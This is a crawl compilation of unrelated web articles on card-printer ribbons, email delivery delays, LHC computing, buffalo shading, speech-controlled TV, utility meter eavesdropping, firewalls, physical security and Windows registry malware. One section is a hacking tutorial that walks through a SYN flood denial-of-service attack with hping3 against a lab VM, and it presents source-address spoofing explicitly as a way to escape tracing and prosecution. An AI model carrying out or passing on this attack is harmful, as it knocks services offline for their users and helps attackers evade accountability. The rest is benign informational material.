YMCIKH (Yellow/Magenta/Cyan/Inhibitor/Monochrome/Heat Seal) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. This ribbon prints to cards requiring specific areas to be unprinted and with difficult-to-print-to card surfaces. The 'I' panel is an inhibitor panel that prevents defined areas of the card to not be printed over. Monochrome or ‘K’ is the black resin panel is used for monochrome printing on the front or back side of the card. The 'H' panel helps HDP film bond to surfaces that are not made of PVC, like polycarbonate or ABS plastic, and in some cases, matte-finish cards.
YMCK (Yellow/Magenta/Cyan/Monochrome) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. Monochrome or 'K' is a black resin panel.
YMCKI (Yellow/Magenta/Cyan/Monochrome/Inhibitor) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. Monochrome or 'K' is a black resin panel. The inhibitor or 'I' panel is used to prevent the retransfer film from being applied to specified areas, such as signature panels or surface foils. The main use of the I panel is when printing on cards with a signature panel, since the retransfer film would make this area hard to write on.
YMCKIKI (Yellow/Magenta/Cyan/Monochrome/Inhibitor/Monochrome/Inhibitor) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combines in varying degrees to make a full spectrum of colors. Monochrome or ‘K’ is the black resin panel is used for monochrome printing on the front or back side of the card. The inhibitor or ‘I’ panel allows cards with surface foils or signature panels to be printed on by preventing the retransfer film from being applied to those specified areas during printing. The latter ‘K’ and 'I' panels are used for printing dual-sided cards that require not printing on portions of both the front and back side of cards like contact smart chips or holograms embedded into cards.
YMCKK (Yellow/Magenta/Cyan/Monochrome/Monochrome) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. Monochrome or 'K' are black resin panels - the latter 'K' is used for monochrome printing on the back side of a card.
YMCKT (Yellow/Magenta/Cyan/Monochrome/Topcoat) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. Monochrome or 'K' is a black resin panel, and the topcoat panel provides the card with minimal protection against everyday use and environmental elements (e.g., UV rays).
YMCKO (Yellow/Magenta/Cyan/Monochrome/Overcoat) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. Monochrome or 'K' is a black resin panel, and clear overlay or 'O' is a thin, protective layer.
YMCKOK (Yellow/Magenta/Cyan/Monochrome/Overcoat/Monochrome) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. Monochrome or 'K' is a black resin panel, and clear overlay or 'O' is a thin, protective layer. The latter 'K' is used for monochrome printing on the back side of a card. | <urn:uuid:7add2928-8bf8-4a1b-a72d-0425c3a20ebe> | CC-MAIN-2017-04 | http://www.idzone.com/learning-center/id_glossary_of_terms.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00153-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.902741 | 6,654 | 2.578125 | 3 |
Why Email is Not Instantaneous — and Not Supposed to Be
The common perception is that email messages seem to arrive almost as soon as they are sent. Messages often appear to be delivered “instantaneously“. So, when a message is occasionally delayed, it seems like something must be wrong. Sometimes there is a problem. Sometimes the delay is the result of normal email flow.
If the messages never show up at all … that is a different situation altogether. See “Where’s the Email? The Case of the Missing or Disappearing Email” for ideas on diagnosis and understanding of that.
The multi-server delivery path
When an email message is sent, it is given to an email server for processing and delivery. That email server may forward it on to another email server, and so on, until it ultimately arrives in the recipient’s mail box.
Generally messages will pass though at least two email servers (the sender’s and the recipient’s). In some cases, when the sender and recipient are on the same machine and it is setup in a certain way, the email may be delivered on arrival. This is not unusual for internal corporate email, but rarely happens for general email messages.
In most cases, the sender’s and recipient’s email systems may each pass the message though multiple servers for various reasons, resulting in the message traversing many servers (a.k.a “hops”) in its delivery path.
Email is designed to be extremely reliable — messages should always make it to their destinations, if at all possible.
Each server in the delivery path that accepts the email message is responsible for ensuring that the message makes it to the next server. If nothing goes wrong, the hand off can take place very quickly (in less than a second in many cases). However, many times, things do happen such as:
- DNS or network issues prevent the server from being able to determine what server is supposed to be next.
- Communications with the next server are temporarily failing due to network issues or Internet congestion.
- The server itself is very busy at the moment.
- The next server is very busy at the moment and temporarily refusing connections.
- Additional processing of the message needs to take place before it can be relayed to the next server.
Each of these things can result in the message being delayed in reaching the next server.
If the server itself is busy or needs to perform further actions on a message, it may defer (or queue) processing of the message for a short time until it has available capacity. This often happens if there is a “spike” where many messages are arriving at a server in a short time, pushing its ability to process them all. In cases like this, servers respond by delaying some messages until they can catch up.
If the next server cannot be determined or reached or is not accepting email temporarily, then the message must be queued and delivery re-tried later.
Queue processing delays
When messages are temporarily deferred for later re-try or processing, they are often “queued”. This means that they are dumped into a special location for pending messages. Mail servers will check their queues periodically and process the messages waiting there to get them going. However,
- It is up to the mail server administrators to manage how often the queue is checked and processed. This interval can be low (like once/minute) or slower (like once every 5-10 minutes, every hour, or worse).
- If the queues are getting full (e.g. lots and lots of messages are there), it may take a long time to process them all.
- Even if a message is quickly re-tried, it will not be delivered until the next server is available and reachable.
Generally, messages are kept in mail queues and retried over and over for up to 5 days; however, some systems (such as public providers like AOL, Hotmail, Yahoo, Gmail, bulk mailers, etc.) may have much shorter grace periods for successful delivery.
Some other common reasons for apparent delays include:
- Large Messages: Messages size can affect delivery times when it is transmitted over relatively slow, low-bandwidth, or very busy connections. It may take some time to upload a large message to the server, resulting in an apparent delay. For example, if you have a 50MB email message to send and a 512 Kbps DSL line, it will take over 13 minutes to upload the message. Additionally, large messages will slow down processing and delivery at every stage in the process.
- Many Recipients: Messages addressed to large numbers of recipients take much more work to process, resulting in additional apparent delays.
“Sender Offline” delays:
Often when customers ask about message delays and we look into the cause, it appears that for example the message was sent last night but did not arrive until the next morning. What has often occurred in these cases is that the sender composed and sent the message when offline — Their Internet connection was down, they already unplugged, etc. The “Date” stamp on the message is when they “sent” it (and it was put in their Outbox). However, the message never left the sender’s computer until the next day when the sender went back online and opened his/her email program.
In this case, the apparent delay is the sender’s “fault” for not being online when sending.
Occasional delays aren’t uncommon
When multiple servers must each process the message, must be able to communicate with each other, and must have the capacity to manage the processing requirements, delays can and do occur. In fact, the more servers in the path, the more likely a delay is to happen.
It is typical to see occasional delays of up to 1-3 minutes in email delivery due to random issues like server processing loads and network traffic spiking here and there on the Internet.
Delays of tens of minutes to hours are most often the result server maintenance or outage issues, or mail queues not being properly or promptly processed.
Where was the delay?
We are commonly asked to look at a message that was received to determine where/why the delay occurred. It is actually quite easy to figure this out.
First, you need to get the full headers of the received email message. See Viewing the Full Source/Headers of an Email message.
An example delayed email messages might contain header lines that look like this:
Received: via dmail for +INBOX; Tue, 3 Feb 2013 19:29:12 -0600 (CST) Received: from abc.luxsci.com ([10.10.10.10]) by xyz.luxsci.com (8.13.7/8.13.7) with ESMTP id n141TCa7022588 for <email@example.com>; Tue, 3 Feb 2013 19:29:12 -0600 Return-Path: <firstname.lastname@example.org> Received: from [192.168.0.3] (verizon.net [22.214.171.124]) (email@example.com mech=PLAIN bits=2) by abc.luxsci.com (8.13.7/8.13.7) with ESMTP id n141SAfo021855 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT) for <firstname.lastname@example.org>; Tue, 3 Feb 2013 19:18:05 -0600 Message-ID: <4988EF2D.email@example.com> Date: Tue, 03 Feb 2013 20:10:10 -0500 From: "Test Sender" <firstname.lastname@example.org> MIME-Version: 1.0 To: "Test Recipient" <email@example.com> Subject: Example Message Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Comment: Lux Scientiae SMTP Processor Message ID - 1233710941-9110394.93984519
It is the “Date” and “Received” header lines that are of importance.
The “Date” header is added by the sending email program (i.e. Outlook) and may be blatantly inaccurate, for example if the sender computer’s clock is off. Also, the “Date” is added when the message is sent, not when the message leaves the sender’s “Outbox”. So, if the sender is offline for some reason, or the message is otherwise sitting in the Outbox, the message may look “delayed”. In this example, the delay is merely in getting the message off of the sender’s computer.
The “Received” header lines are added by the mail servers that process the message. One Received header line is added each time a mail server accepts the message for processing. They are added from the “bottom up” — so the last added Received line is at the top and the first is at the bottom.
You can detect where the delays happened by looking at these header lines, in order, and comparing the date and time stamps (once you correct for differences in time zones).
In this contrived example, we see that:
- The message was sent at 8:10:10 pm Eastern Time
- The message was delayed in the sender’s Outbox for 7 minutes, 55 seconds, based on the first “Received” line, It also may just have taken a long time for the message to be uploaded to the server, i.e. if the message was big and the connection slow.
- For some reason, this mail server delayed the message for about 11 minutes before it made it to the recipient’s server, where it was accepted and delivered immediately.
One could then ask the IT staff running example server “abc.luxsci.com” to look into their logs for information as to why the message was delayed for 11 minutes, if this delay is significant to you.
- Tracing the Origin of an Email Message — and Hiding it
- How Can You Tell if an Email Was Transmitted Using TLS Encryption?
- Automate Secure Outbound Email Sending with SecureLine
- Having Problems Sending Email Because Your ISP is Blacklisted?
- Brand the Email Headers of your Outbound Bulk Email: LuxSci High Volume | <urn:uuid:a948901c-def4-401e-a7b6-5e9e98db70d2> | CC-MAIN-2017-04 | https://luxsci.com/blog/why-email-is-not-instantaneous-and-not-supposed-to-be.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00061-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.923837 | 2,243 | 2.5625 | 3 |
The Large Hadron Collider (LHC) relies on parallel processors, including coprocessors, to power its massive acquisition system. Without the computational power afforded by these processors, discovery is hampered. The reach of the science is supported in part by improvements in computational speed.
Valerie Halyo, research scientist in the Department of Physics at Princeton University, is a big proponent of using parallel processing to accelerate scientific discovery. In her latest work, Halyo and her team evaluated several accelerators such as the NVIDIA Tesla GPU and Intel Xeon Phi in concert with multi-core Intel Xeon CPUs. Halyo advises to leverage Xeon Phi as “it is possible to develop and optimize a single code in C, C++, or FORTRAN to use on both a multi-core CPU and on a Xeon Phi coprocessor.”
Listen to our Soundbite interview with Dr. Valeri Halyo here.
Acquiring data from the LHC requires substantial computational power to satisfy the needs of the data acquisition or triggering system. Triggering effectively keeps relevant data and throws away the useless ones. The overarching goal is to process the acquired data fast enough to reconstruct the trajectories of charged particles in real-time.
Traditional reconstruction algorithms aren’t able to cope with the massively dense datasets generated from the system. These algorithms are simply overwhelmed with the high pile-up of information. By leveraging parallel processing, this is no longer an issue. Not only does it overcome the initial challenge of parsing large amounts of data, it also enables the development of new complex triggering algorithms. With parallel processing, the LHC triggering system is more efficient. More data is captured in less time.
In evaluating their triggering algorithm based on the Hough transform, Halyo notes that 92% of the execution time is spent on computing the Hough transform itself. Halyo provides the following tips for optimizing their algorithm for parallel processors.
NVIDIA Tesla K20c (GPU)
- Minimize expensive trigonometric functions.
- Develop an efficient memory access pattern for reading and writing to global memory.
- Avoid race conditions by safely handling updates of values.
- Reduce global memory accesses.
- Replace atomic memory accesses from global memory to shared memory.
Intel Xeon E5-2697v2 (CPU) and Intel Xeon Phi QS-7120P (MIC)
- Use thread parallelism for the outer loops of the Hough transform.
- Utilize the auto-vectorization capabilities of the Intel compiler.
- Avoid cross-thread synchronization using OpenMP’s reduction mechanism and thread-private data storage.
- Improve synchronization by using ordered for-loops.
- Improve data locality via strip-mining and blocking techniques.
- Use the offload functionality for the Xeon Phi.
- Use data persistence to avoid reallocation penalties for multiple frames.
Although the Hough transform is a highly parallel task, the nature of the calculation hampers complete utilization of the coprocessors. Halyo notes that the irregular data access patterns significantly affects the performance of the NVIDIA GPU and Xeon Phi coprocessor. In the end, the Intel Xeon CPUs fared best for various sample sizes, but Halyo still supports the use of coprocessors noting that when the hardware and software matures, “it could be the leap necessary to discover new physics at the LHC.” | <urn:uuid:44fa3243-41a3-4f6e-b271-d8ef1dd03cf4> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/02/17/pushing-parallel-processing-power-cern/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00061-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.863581 | 708 | 3.25 | 3 |
Tech View: Technology for Making TV Viewing Easy
TV viewing has become harder. With massive amounts of available content—some homes have access to 400+ channels, a number that may rise soon to 1,000—and accessory devices such as set-top boxes, DVRs, converter boxes, TiVo®, and VCRs, watching and recording TV requires some effort. Programs of true interest and their times have to be hunted down amid all the other programs, buttons on multiple remotes have to be identified, and the interfaces of the DVR and other devices must be mastered (some more intuitive than others).
Cutting through this clutter to make TV viewing easy again is becoming increasingly important. Solutions include universal remotes, Windows®-type interfaces, and even hand gestures, but they themselves require some learning and may be just a different way to manage the clutter.
One solution, however, requires little or no learning, is simple and natural and intuitive, and actually does away with clutter-speech. Instead of scrolling through lists or navigating a menu or tapping out instructions, a speech interface let's you say what you want to watch. Speaking "The Real Housewives of New Jersey" or "Knicks game" into a microphone-based remote would return a short, selectable list of programs fitting the description, giving times and days.
How long before speech-controlled TV is a reality? Maybe not too long. The technologies are pretty much in place.
What's missing to make speech-controlled viewing possible are the computing resources needed to perform speech recognition on the thousands of TV shows and videos available to consumers. A speech recognition application works by matching spoken words to words (really sounds of words) contained in a language model that has been carefully constructed for a specific application and context, such as a banking call center. For speech-controlled viewing, the language model would contain everything in an electronic program guide. Not only is this a huge collection of words to recognize, it's one that would have to be updated at least nightly to keep it current with programming changes.
While some devices have onboard speech recognition (the iPhone, for example), device-based speech recognition would be impractical for a model as large as the one required by an electronic program guide. Neither the TV nor set-top box (or remote) has sufficient computing resources for performing speech recognition on all available content. While there are hardware solutions for adding PC-type resources to these devices, new hardware increases the costs to the consumer.
In addition, there is the very practical problem of having to download to each device a new language model as programming changes are made. Downloading might occur as often as every night. Software changes would also have to be periodically downloaded.
The preferred solution is to do all the speech processing on networked servers, and connect the TV set-top box to the same network using a residential, or home, gateway. Commands spoken into a remote would be relayed from the gateway over the network to a central location where servers would perform the necessary speech recognition.
This scheme is similar to using an iPhone or other smartphone to request a listing from a business search such as YELLOWPAGES.COM®. The spoken request is relayed via the cell network to speech recognition servers, where the spoken request is converted to commands used for the database lookup.
. . . do all the speech processing on networked servers, and connect the TV set-top box to the same network . . .
With speech recognition done at a central location, updates to both software and the language models can be done easily and as frequently as needed. There is an added benefit. The spoken commands used by people in the home represent hard-to-get, real-world sample data that can be used in training the models to improve performance. If speech recognition was done on the device, this valuable resource would be more difficult to exploit for refining the models.
Benefits of a connected TV
If server resources become available to at-home TV viewers, a lot more can happen to make TV viewing easy again.
With servers performing program lookup, searches can become more complex and involve metadata such as program type, actor, or any combination of search criteria. Thus you could search not just by title but also by genre or actor. Speaking "Late Night Comedy Show," "Basketball games on Sunday night," or "Movies with Kiefer Sutherland" would get back a list of programs fitting the description.
But why stop there? With computing resources available, why not put the server resources to work to suggest programs or videos you might like? You could just say What's on tonight? and have the TV return a list of suggestions tailored for your preferences. If Netflix® and book vendors can make reasonable guesses as to what you'd like, TV providers can run similar algorithms on TV programming data stored on the centralized servers.
The servers could also program the DVR for you. If you want to record a program, just say what you want to record and once the speech recognition is performed, the instructions could be sent directly to the DVR. No need for you to be involved other than to say what you want.
The potential of IPTV
Connecting TV devices to a content provider's servers over a network is the IPTV model, a relatively new paradigm in which a private provider (usually the telephone company) distributes content over an existing broadband infrastructure by first encoding it and relaying it as a series of IP (Internet Protocol) packets over a broadband network, rather than over traditional cable or the airwaves.
(Although IP is the same protocol used to relay video over the Internet, IPTV is not TV over the Internet; it's not the same as watching YouTube clips on a PC. Instead, IPTV is high-quality, high-resolution video that's delivered over a broadband connection, which can also deliver Internet content such as web pages, YouTube video, email, etc.)
An example of an IPTV service is AT&T's U-verseSM, where a home gateway connects the TV set-top box to AT&T's broadband network, enabling the set-top box to communicate with servers running AT&T's WATSON ASR (and other speech technologies) as well as with other devices on the network. The TV set-top box is essentially an endpoint on the network, just the same as a PC, laptop, or iPhone.
To stream speech to the network servers, it is advantageous to exploit the Wi-Fi feature of the U-verse gateway. With its Wi-Fi capability, the gateway could also serve as an access point for any Wi-Fi-enabled devices (TV remote, laptop, iPhone) to communicate with other endpoints on the IP-based home network, including any home PCs. Thus computer files, including emails and photos, could be viewable on the TV, and any Wi-Fi enabled device (such as the iPhone) could control the set-top box and DVR.
If the TV's set-top box is a node on a network, communication between the home and the provider becomes two-way, with commands going out and programs and device instructions coming in. While the full ramifications of two-way communication are not yet known, it is certain that interactivity will be a major benefit of IPTV and will include much more than just shopping or participating in game shows from home.
Speech-controlled viewing is not quite ready due to several factors. Some are long-standing ASR problems, such as the constant puzzle of predicting what people may say and the difficulty in recognizing uncommon accents or the high-pitched voices of children.
In addition, speech-controlled viewing brings its own set of hard problems.
But these are problems for the engineers.
What would consumers have to do to make TV-viewing easy again?
Not much, other than subscribing to an IPTV service that offers speech recognition and a voice remote. For many people, having IPTV means replacing a cable service with an IPTV one. (IPTV service will normally be offered as part of a triple- or quadruple-play package that includes phone (wireline and wireless), Internet, and TV.
From then on everything else is easy since the provider maintains the servers and software and takes on the responsibility for programming the DVR. All consumers need to do is say what they want to watch using their own words.
How to Use a Voice Remote
Tech View: Views on Technology, Science and Mathematics
Sponsored by AT&T Labs Research
This series presents articles on technology, science and mathematics, and their impact on society -- written by AT&T Labs scientists and engineers.
For more information about articles in this series, contact: firstname.lastname@example.org. | <urn:uuid:c3278471-0f87-40a1-b72d-fae8f22d55d5> | CC-MAIN-2017-04 | http://www.research.att.com/articles/featured_stories/2009/200910_techview_tech_making_tv_viewing_easy.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00455-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950864 | 1,802 | 2.515625 | 3 |
Gu Z.,Yunnan Agricultural University |
Yang S.,Yunnan Agricultural University |
Yang S.,Yunnan Provincial Key Laboratory of Animal Nutrition and Feed Science |
Leng J.,Yunnan Agricultural University |
And 7 more authors.
Applied Animal Behaviour Science | Year: 2016
Shade shelter is widely used to reduce heat load for farm animals, but little research focus on the cooling effects for Dehong buffalo calves. The aim of this experiment was to evaluate the impacts of shade cooling on the physiological and behavioural parameters for Dehong buffalo calves. Shade with 99% blockage of solar radiation was covered on steel frame with a 2.5. m height above the loafing area floor (shaded). The loafing area of the control group was the same as the shaded group, apart from no shade shelter above the loafing area (non-shaded). Twenty-four Dehong buffalo calves were randomly and averagely allocated to the non-shaded and shaded groups. Six Dehong buffalo calves were loose housed in a barn, and they had access to loafing area. The results showed that the average daily air temperature of the loafing area under shade was lower 1.5. °C than that of the loafing area without shade shelter. No difference in rectal temperature was found between the non-shaded and shaded calves (P >. 0.05), but respiration rate of the non-shaded group in noon (12:00. h, 31.6 breaths) and evening (18:00. h, 28.5 breaths) was greater than for calves in shaded group (26.1 and 25.3 breaths, respectively) (P <. 0.05). When ambient temperature exceeded 30. °C, shaded calves spent much of their time (21.7%) lying in the loafing area, and no calf in non-shaded group preferred to lie in the loafing area with strong solar radiation (P <. 0.05). The use of shade for calves was affected by thermal environment, and the use of shade was greater (41.4%) in hot weather (above 30. °C) than that of the warm weather (22-29. °C) (P <. 0.05). In conclusion, the provision of shade above the loafing area is conducive to improving thermal environment for Dehong buffalo calves in subtropical area characterised with high ambient temperature coupled with high humidity in summer. © 2016. Source | <urn:uuid:43f8721a-0551-494a-88ee-45f58e59ef8f> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/bureau-of-animal-husbandry-and-veterinary-medicine-80223/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00365-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.920123 | 521 | 2.59375 | 3 |
Welcome back everyone, lets talk about DoS attacks and hping3! DoS attacks are some of, if not the, most common attack (DoS stands for Denial of Service). Not to be confused with DDoS, a DoS attack is when a single host attempts to overwhelm a server or another host. This is done by expensing all resources, so that they cannot be used by others.
There is a tool by the name of hping3 that allows the attacker to craft and send custom packets. This allows us to do many things with it including recon, possibly some basic exploitation, but for now we’re going to use it to launch a DoS attack. There are mutliple kinds of DoS attacks, but today we’re going to launching a SYN flood. This sends requests to a server as fast as it can. When these requests are processed, it will take up the server’s resources, and will render it unable to respond to any actual users trying to use it.
The problem with DoS attacks is that when we send all these packets the server, it has our address in it. All the administrator has to do is look at the logs and turn our address into the authorities, then we’re behind bars in a matter of days. We’re not only going to be launching a SYN flood, but we’re going to spoof our address so we don’t get thrown in the big house! Before we launch the attack, let’s deeper discuss the concept of SYN flooding.
As we previously stated, a SYN flood is sending an insane amount of requests to a server in order to use up all it’s resources. But you may be asking “What does SYN have to do with using up resources?“. Well, it’s all about the TCP three-way handshake.
If you haven’t already read the second recon article, I suggest you do so in order to understand the TCP three-way handshake. Remember, SYN stands for synchronize. When we send a SYN packet, we’re requesting to establish a connection.
We can see that the attacker sent many SYN packets (with spoofed addresses) to the victim. The victim responded with a SYN-ACK to confirm the connection, but since there was no response, it sends it again and again, using up all it’s resources! Also, since the attacker used a fake address, the administrator will have a much more difficult time tracing the source of the attack.
Now that we know how SYN floods work, let’s get to launching the attack!
Launching the DoS Attack
First things first, we’ll need to look at the help page for hping3. In order to condense the output, I’m going to grep the lines that are essential. Let’s see the flags we need to use:
We can see here that we need to use –flood, –interface, -S, and –rand-source. These flags are fairly self-explanatory, but let’s run through them. Using –flood will set hping3 into flood mode. This is the flood part of our SYN flood. Then we have –interface, so we can decide which network interface to send our packets out of. Finally we have –rand-source, this will randomize the source address of each packet. Not only will source not point back to us, but it will appear to come from a wide range of addresses, this increases the trace difficulty even further.
Now that we know what flags we’re going to use, let’s launch our attack. I’m going to be launching this attack against a VM I’ve set up, Metasploitable 2. First, let’s ping the Metasploitable VM to make sure it’s up and running, then we’ll ping it again when we launch our attack to see the effect. Let’s ping it now:
Alright, our VM is up and running. Now let’s take a look at the command we’ll use to launch our attack before we do it:
Alright, now that we have our command let’s execute it. Now that we’ve started the attack we should see some output like this:
There we go! Now we’re flooding the target. To see our spoofed packets in action, let’s open up one of the best network sniffers out there, wireshark. We should be able to see packets from multiple addresses being flooded towards the same address. Let’s take a look at the packets the wireshark has captured:
Here we can see 5 packets, each with it’s own unique source address! We can see that they are being send to our target at the IP 10.0.0.37, with the SYN flag set. Now that we’re attacking our target, let’s retry pinging the target and see what happens:
We can see by this ping tool output that our pings failed, we can’t reach the server anymore! This proves that our attack was effective in that the server spent all it’s resources responding to our attack instead of the real users, we’ve successfully DoS’d our target!
Since we’ve randomized the source of every packet, it will be much more difficult for an administrator. Now we can launch DoS attack without landing ourselves a seat in prison!
I know this tutorial isn’t really related to any of my currently running series such as the recon series. But due to the recently published article on DoSing with LOIC I felt like this was necessary so if anyone does decide to use this power for evil they won’t land themselves in prison. I’m just looking out for my fellow hackers! The next article will be the start of a brief course teaching the basics of Python, I’ll see you there!
DISCLAIMER: HackingLoops does not condone the use of these tools for illegal activities, we’re just here to educate! | <urn:uuid:da62222b-b7f5-44cf-beec-96f3eeec5117> | CC-MAIN-2017-04 | https://www.hackingloops.com/category/ddos/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00391-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.928922 | 1,310 | 2.875 | 3 |
The presence of a firewall, whether it’s hardware or software, provides a significant security boost for any computer user. This is especially true if you manage a business. Companies need to ensure that their systems are sufficiently protected in order to prevent the infiltration of viruses, bugs, or hacking. Firewalls are an indispensable security measure that dramatically reduces risks to your business network.
As the internet has grown and progressed over the years, websites have become more interactive and functional. Many company websites are used to collect customer information, collect online orders, complete transactions, host chat conversations, and much more. With so much information being stored electronically, it is critical for businesses to do everything in their power to protect it. Losing company or customer data can have a significant impact on a company, such as hindered productivity or a tarnished reputation. In some cases, it can even result in the closure of a business.
Additionally, if your company utilizes cloud computing for storing important information, it is important to minimize risk by employing a firewall. Although many cloud computing hosts offer higher levels of security, it is important for businesses to do what is in their power to minimize risk. Cloud computing is a great service for businesses because of its ease of use, but storing data electronically can pose a risk if it is not properly protected by users on both ends; the cloud host and a company using their services.
In some cases, hackers are infiltrating business networks in order to piggyback on their internet service. This can result in hefty overage fees, costing the company a considerable amount of money. Additionally, if a hacker is stealing a significant amount of bandwidth, employees may experience a slow internet connection. Again, this can impact productivity, which then results in a loss of revenue.
A firewall can keep track of suspicious logins, filter our SPAM emails, and block suspicious applications. It can also monitor network activity and create a log, which can assist in identifying where and when a breach may have occurred. This feature can help your company contain and fix the problem faster, instead of trying to solve the issue after the damage has already taken place.
Many hardware and software companies are now providing firewalls that are specifically designed for businesses. As more businesses and customers continue to migrate online, there is an increased necessity for reliable security measures. If the proper defenses are not put in place, a business may be at risk of losing everything.
To learn more about obtaining a secure connection, click here.
Blog Posted by Vanessa Hartung | <urn:uuid:5f01a9d3-54bb-4b2e-972b-779b940c7c7d> | CC-MAIN-2017-04 | http://blog.terago.ca/2012/12/13/why-your-company-needs-a-firewall/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00209-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948347 | 512 | 2.5625 | 3 |
As technology becomes more prevalent and easier to use, the risk of a security breach also seems to become more likely -- and the use of wireless home utility meters are no exception. As of 2010, more than one-third of all homes in the U.S. use automatic meter reading (AMR). The technology is useful because it makes data collection easier, but according to researchers at the University of Southern California (USC), the unencrypted signal may also be easier for an eavesdropper to read.
"There's been a lot of discussion about smart meters and whether they're secure or not," Lead Researcher Wenyuan Xu told Phys.org. "But smart meters are not yet widespread. So we wanted to look at the wireless readers common now. Are they secure? Will they leak private information?"
Like many technologies, wireless readers also reduce the demand for human workers. A single worker can drive a truck down a street and collect information on hundreds of houses, rather than have many workers manually gather data from each meter. Unfortunately, there is easier access for people who are not supposed to have access to such data.
Xu's team was able to reverse-engineer the transmission technology used by the meters to obtain access to meter usage data. Once the team understood how the technology worked, they attached an antenna and an amplifier to a laptop and visited an apartment complex to do some snooping.
"We were able to detect even further than we expected," Xu said. "The complex had 408 units, but we were able to see 485, so we were seeing beyond the complex itself." Additionally, the data could be matched to individual apartments because the packet data contained identification numbers that matched numbers stamped on the physical meters found on the apartments.
While Xu's team said they believed the packet data transmitted should be encrypted, they admitted that such snooping is not easily done. However, in the wrong hands, the data could be misused by “bad guys,” Xu said.
Read the full story about unencrypted utility meter signals on Phys.org.
Photo courtesy of Shutterstock.com | <urn:uuid:d863d612-0420-463b-b59a-1959f866e7a5> | CC-MAIN-2017-04 | http://www.govtech.com/Study-Unencrypte-Smart-Meter-Signal-Easy-to-Read.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00511-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.971191 | 433 | 2.765625 | 3 |
Get a glimpse inside Roberta Bragg's new book "Hardening Windows systems" with this series of book excerpts. This excerpt from Chapter 1, "An immediate call to action," offers a quick overview on how to secure systems, starting with your own laptop and PDA. Click for the complete book excerpt series or purchase the book.
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
Physically secure all systems
Start with your own system. If it's a laptop, do you cable-lock it at each place you use it? If you move about, even in your own buildings, do you take the time to secure it? When you travel, do you leave it unlocked in the hotel room? When you must leave the laptop in a hotel room, what data is on the hard drive? With most laptops, the hard drive can be removed even if the computer is cable-locked. The value of the data may be many times higher than the value of the computer. If data on the laptop is sensitive, perhaps you can remove the hard drive and carry it with you, or lock it in the hotel safe when you want to leave the laptop locked in the room.
What about your PDA? What's on it that would be damaging if lost? If your computer is a desktop, who can physically access it? Can it be stolen? The hard drive removed? From the data center to the traveling laptop, physical security is weak. Why would an attacker bother crafting code to break into your systems when all she has to do is steal them? Why penetrate your network defenses when she can walk by and insert a CD-ROM with malignant code on it? Or use her USB data-storing wristwatch to steal data?
Keep servers locked up. Remove CD-ROMs and floppies from computers in public are as. Provide traveling laptop users with cable locks. Make sure those with access to the data center don't allow others in. Don't prop open doors; don't allow "tailgating," the process where someone follows an authorized person into the data center. Teach security guards to look for contraband. (Picture-taking phones should be banned from many locations.)
Click for the next excerpt in this series: Keep secrets.
Click for book details or purchase the book. | <urn:uuid:c43e0322-be95-4c22-b3af-f0afd2e439c9> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/1280096119/Physically-secure-all-systems | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00447-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940747 | 486 | 2.640625 | 3 |
I saw a webcast done by Peter Ewane and Javvad Malik recently. The summary of what Peter had to say and Q&A follows; you can also view the recorded webcast.
What is Malware?
Malware can be a lot of things. It can be a virus, a worm, spyware, a Trojan horse, or ransomware. It’s basically any malicious program that you would not want on your computer.
Lately it has become common to see malware hide in the Windows Registry. Why the Windows registry? The Windows registry is quite large and complex, which means there many places where malware can insert itself to achieve persistence. A good example of this behavior is Poweliks. Poweliks sets a null entry utilizing one of the built-in Windows APIs, ZwSetValueKey, which allows it to create a registry key with an encoded data blob. I’m not sure why the Windows API allows a null entry, but it does. This is one of the many ways that malware can utilize the Windows registry to hide out, autostart, and maintain persistence on many systems.
Here’s an OTX pulse on Poweliks: https://otx.alienvault.com/browse/pulses/?q=POWELIKS
